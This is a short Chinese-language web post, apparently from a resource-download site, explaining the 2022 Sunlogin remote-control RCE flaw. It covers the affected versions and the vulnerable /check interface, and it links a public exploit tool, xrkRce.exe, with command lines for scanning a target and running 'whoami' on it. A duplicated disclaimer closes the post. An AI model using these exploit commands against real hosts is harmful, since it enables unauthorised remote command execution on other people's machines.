向日葵介绍
向日葵远程控制软件是一款免费的集远程控制桌面,远程开机,远程管理,支持内网穿透的一体化远程控制管理软件
漏洞介绍
向日葵远程控制是上海贝锐信息科技的一款提供远程控制服务的国产软件,CNVD-2022-10270/CNVD-2022-03672,漏洞是二月十六号发现,官方于二月二十多号修复的
漏洞原理
向日葵client在windows运行时,会连接远程Oray的服务器,开放对外接口,接口统一由sunlogin 处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check 处,当cmd的值为ping/nslookup开头时触发
漏洞版本
- 向日葵个人版 for Windows <= V11.0.0.33
- 向日葵简约版 <= V1.0.1.43315(2021.12)
工具介绍
工具来源:https://github.com/Mr-xn/sunlogin_rce
测试xrkRce.exe
xrkRce.exe
-h 指定目标 -t 选择扫描或者命令执行 默认scan -p 设置扫描端口范围 默认4w到65535 -c 需要执行的命令
xrkRce.exe -h 192.168.1.5 -t scan -p 1-65535 xrkRce.exe -h 192.168.1.5 -t rce -p 扫描出来的端口 -c "whoami" 执行命令
免责声明:
1.本站上传的源码,均为平台购买,作者提供,网友推荐,互联网平台整理而来,请下载后24小时内删除。如有需要,请购买正版.
2.请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
3.站内资源若侵犯了您的合法权益,请指出本站立即改正。
4.上述内容仅供学习参考及技术交流之用,未经相关的知识产权权利人同意,用户不得进行商业使用。
5.保姆式服务,百分百售后!
1.本站上传的源码,均为平台购买,作者提供,网友推荐,互联网平台整理而来,请下载后24小时内删除。如有需要,请购买正版.
2.请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
3.站内资源若侵犯了您的合法权益,请指出本站立即改正。
4.上述内容仅供学习参考及技术交流之用,未经相关的知识产权权利人同意,用户不得进行商业使用。
5.保姆式服务,百分百售后!